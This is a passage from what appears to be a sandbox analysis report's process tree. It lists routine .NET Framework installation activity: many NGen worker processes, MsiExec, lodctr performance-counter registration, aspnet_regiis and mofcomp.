      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 174 -InterruptEvent 0 -NGENProcess 130 -Pipe 1d4 -Comment "NGen Worker Process"
      4⤵
      PID:2864
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 174 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 208 -Comment "NGen Worker Process"
      4⤵
      PID:2088
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 0 -NGENProcess 200 -Pipe 1e8 -Comment "NGen Worker Process"
      4⤵
      PID:1672
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 200 -InterruptEvent 0 -NGENProcess 204 -Pipe 1fc -Comment "NGen Worker Process"
      4⤵
      PID:2376
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent a8 -InterruptEvent 0 -NGENProcess 174 -Pipe 204 -Comment "NGen Worker Process"
      4⤵
      PID:576
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent a8 -InterruptEvent 0 -NGENProcess 130 -Pipe 1bc -Comment "NGen Worker Process"
      4⤵
      PID:2124
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1f0 -Pipe 130 -Comment "NGen Worker Process"
      4⤵
      PID:2284
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1ec -Comment "NGen Worker Process"
      4⤵
      PID:2528
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 1b0 -Pipe 218 -Comment "NGen Worker Process"
      4⤵
      PID:1392
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 1cc -Pipe 20c -Comment "NGen Worker Process"
      4⤵
      PID:2240
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent a8 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 1f4 -Comment "NGen Worker Process"
      4⤵
      PID:936
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent a8 -InterruptEvent 0 -NGENProcess 210 -Pipe 220 -Comment "NGen Worker Process"
      4⤵
      PID:1984
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 234 -InterruptEvent 0 -NGENProcess 228 -Pipe 230 -Comment "NGen Worker Process"
      4⤵
      PID:1812
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 224 -InterruptEvent 0 -NGENProcess 210 -Pipe 1cc -Comment "NGen Worker Process"
      4⤵
      PID:1612
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 214 -Pipe 22c -Comment "NGen Worker Process"
      4⤵
      PID:2356
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 224 -Pipe 174 -Comment "NGen Worker Process"
      4⤵
      PID:2300
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 0 -NGENProcess 210 -Pipe 224 -Comment "NGen Worker Process"
      4⤵
      PID:2976
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 0 -NGENProcess 200 -Pipe 240 -Comment "NGen Worker Process"
      4⤵
      PID:488
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 238 -Pipe 200 -Comment "NGen Worker Process"
      4⤵
      PID:2240
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 184 -Pipe 210 -Comment "NGen Worker Process"
      4⤵
      PID:3024
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 228 -Pipe 184 -Comment "NGen Worker Process"
      4⤵
      PID:1568
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 0 -NGENProcess 228 -Pipe 250 -Comment "NGen Worker Process"
      4⤵
      PID:2376
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 0 -NGENProcess 1f0 -Pipe 258 -Comment "NGen Worker Process"
      4⤵
      PID:2476
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 228 -InterruptEvent 0 -NGENProcess 23c -Pipe 24c -Comment "NGen Worker Process"
      4⤵
      PID:1840
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 25c -Pipe 1b0 -Comment "NGen Worker Process"
      4⤵
      PID:2168
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 0 -NGENProcess 228 -Pipe 21c -Comment "NGen Worker Process"
      4⤵
      PID:3048
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 0 -NGENProcess 268 -Pipe 234 -Comment "NGen Worker Process"
      4⤵
      PID:2252
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 238 -InterruptEvent 0 -NGENProcess 254 -Pipe 25c -Comment "NGen Worker Process"
      4⤵
      PID:2440
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 248 -Pipe 264 -Comment "NGen Worker Process"
      4⤵
      PID:1924
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 0 -NGENProcess 23c -Pipe 260 -Comment "NGen Worker Process"
      4⤵
      PID:1708
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 238 -Pipe 278 -Comment "NGen Worker Process"
      4⤵
      PID:1184
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 228 -InterruptEvent 0 -NGENProcess 270 -Pipe 248 -Comment "NGen Worker Process"
      4⤵
      PID:2000
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 0 -NGENProcess 254 -Pipe 228 -Comment "NGen Worker Process"
      4⤵
      PID:2976
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 0 -NGENProcess 26c -Pipe 274 -Comment "NGen Worker Process"
      4⤵
      PID:1728
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 0 -NGENProcess 280 -Pipe 18c -Comment "NGen Worker Process"
      4⤵
      PID:1932
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 27c -Pipe 288 -Comment "NGen Worker Process"
      4⤵
      PID:968
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 270 -Pipe 238 -Comment "NGen Worker Process"
      4⤵
      PID:1612
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 280 -Pipe 298 -Comment "NGen Worker Process"
      4⤵
      PID:436
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 0 -NGENProcess 270 -Pipe 26c -Comment "NGen Worker Process"
      4⤵
      PID:1924
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 23c -Pipe 27c -Comment "NGen Worker Process"
      4⤵
      PID:300
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 28c -Comment "NGen Worker Process"
      4⤵
      PID:756
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 0 -NGENProcess 270 -Pipe 1f0 -Comment "NGen Worker Process"
      4⤵
      PID:912
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 0 -NGENProcess 2a0 -Pipe 270 -Comment "NGen Worker Process"
      4⤵
      PID:2964
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess f4 -Pipe 20c -Comment "NGen Worker Process"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2984
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess 218 -Pipe f4 -Comment "NGen Worker Process"
      4⤵
      PID:756
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 0 -NGENProcess 228 -Pipe 260 -Comment "NGen Worker Process"
      4⤵
      PID:1992
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 0 -NGENProcess 28c -Pipe 27c -Comment "NGen Worker Process"
      4⤵
      PID:2412
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 18c -InterruptEvent 0 -NGENProcess 274 -Pipe 1f0 -Comment "NGen Worker Process"
      4⤵
      PID:3036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 2a0 -Pipe 298 -Comment "NGen Worker Process"
      4⤵
      PID:1508
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 270 -Pipe 2a0 -Comment "NGen Worker Process"
      4⤵
      PID:3052
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 0 -NGENProcess 288 -Pipe 270 -Comment "NGen Worker Process"
      4⤵
      PID:1196
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 220 -InterruptEvent 0 -NGENProcess 28c -Pipe 288 -Comment "NGen Worker Process"
      4⤵
      PID:1664
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 248 -Pipe 220 -Comment "NGen Worker Process"
      4⤵
      PID:2476
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 0 -NGENProcess 25c -Pipe 248 -Comment "NGen Worker Process"
      4⤵
      PID:2232
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 0 -NGENProcess 28c -Pipe 25c -Comment "NGen Worker Process"
      4⤵
      PID:1184
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 228 -InterruptEvent 0 -NGENProcess 230 -Pipe 28c -Comment "NGen Worker Process"
      4⤵
      PID:2132
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 0 -NGENProcess 264 -Pipe 230 -Comment "NGen Worker Process"
      4⤵
      PID:2240
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 0 -NGENProcess 228 -Pipe 264 -Comment "NGen Worker Process"
      4⤵
      PID:2276
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 250 -Pipe 228 -Comment "NGen Worker Process"
      4⤵
      PID:2964
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 234 -InterruptEvent 0 -NGENProcess 24c -Pipe 250 -Comment "NGen Worker Process"
      4⤵
      PID:2940
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 0 -NGENProcess 1b0 -Pipe 24c -Comment "NGen Worker Process"
      4⤵
      PID:2476
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 0 -NGENProcess 234 -Pipe 1b0 -Comment "NGen Worker Process"
      4⤵
      PID:2668
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 0 -NGENProcess 21c -Pipe 234 -Comment "NGen Worker Process"
      4⤵
      PID:2360
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 0 -NGENProcess 258 -Pipe 21c -Comment "NGen Worker Process"
      4⤵
      PID:2932
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 184 -Pipe 258 -Comment "NGen Worker Process"
      4⤵
      PID:1812
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 200 -InterruptEvent 0 -NGENProcess 1cc -Pipe 184 -Comment "NGen Worker Process"
      4⤵
      PID:1588
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 240 -InterruptEvent 0 -NGENProcess 210 -Pipe 1cc -Comment "NGen Worker Process"
      4⤵
      PID:1500
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 224 -InterruptEvent 0 -NGENProcess 200 -Pipe 210 -Comment "NGen Worker Process"
      4⤵
      PID:2864
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AD27A820B603C4A427EA53152E868CD0
  2⤵
  PID:2364
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\netmemorycache.ini"
    3⤵
    PID:3052
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru
    3⤵
    PID:1984
  - - C:\Windows\SysWOW64\wbem\mofcomp.exe
      mofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof
      4⤵
      PID:2964
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelPerformanceCounters.man"
    3⤵
    PID:936
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_SMSvcHostPerfCounters.ini"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.ini"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounters.ini"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_Networkingperfcounters.ini
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini
    3⤵
    PID:1392
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe update /queue
    3⤵
    PID:488
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe executeQueuedItems 1
    3⤵
    PID:1196
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 148 -InterruptEvent 0 -NGENProcess 10c -Pipe 118 -Comment "NGen Worker Process"
      4⤵
      PID:1776
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 150 -InterruptEvent 0 -NGENProcess 1ac -Pipe 144 -Comment "NGen Worker Process"
      4⤵
      PID:2612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 19c -InterruptEvent 0 -NGENProcess 1a8 -Pipe 1ac -Comment "NGen Worker Process"
      4⤵
      PID:2212
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 0 -NGENProcess 1a8 -Pipe 194 -Comment "NGen Worker Process"
      4⤵
      PID:2408
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b8 -InterruptEvent 0 -NGENProcess 148 -Pipe 1a0 -Comment "NGen Worker Process"
      4⤵
      PID:2192
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c8 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 148 -Comment "NGen Worker Process"
      4⤵
      PID:2864
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1e0 -Comment "NGen Worker Process"
      4⤵
      PID:2996
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 1c8 -Pipe 1dc -Comment "NGen Worker Process"
      4⤵
      PID:1908
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b8 -InterruptEvent 0 -NGENProcess 198 -Pipe 1f0 -Comment "NGen Worker Process"
      4⤵
      PID:2076
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1fc -Comment "NGen Worker Process"
      4⤵
      PID:2616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c0 -InterruptEvent 0 -NGENProcess 198 -Pipe 1c8 -Comment "NGen Worker Process"
      4⤵
      PID:2168
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 198 -Comment "NGen Worker Process"
      4⤵
      PID:1736
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess 1ec -Pipe 1b8 -Comment "NGen Worker Process"
      4⤵
      PID:2712
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1f8 -Comment "NGen Worker Process"
      4⤵
      PID:2412
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent c4 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1ec -Comment "NGen Worker Process"
      4⤵
      PID:588
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess c4 -Pipe 1e4 -Comment "NGen Worker Process"
      4⤵
      PID:2324
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 20c -Comment "NGen Worker Process"
      4⤵
      PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 200 -Comment "NGen Worker Process"
      4⤵
      PID:1544
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent c4 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 1e8 -Comment "NGen Worker Process"
      4⤵
      PID:2956
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 0 -NGENProcess c4 -Pipe 21c -Comment "NGen Worker Process"
      4⤵
      PID:2348
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 210 -Pipe 1f4 -Comment "NGen Worker Process"
      4⤵
      PID:2384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 224 -Pipe 210 -Comment "NGen Worker Process"
      4⤵
      PID:2988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 214 -InterruptEvent 0 -NGENProcess 22c -Pipe c4 -Comment "NGen Worker Process"
      4⤵
      PID:2412
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 23c -InterruptEvent 0 -NGENProcess 22c -Pipe 224 -Comment "NGen Worker Process"
      4⤵
      PID:188
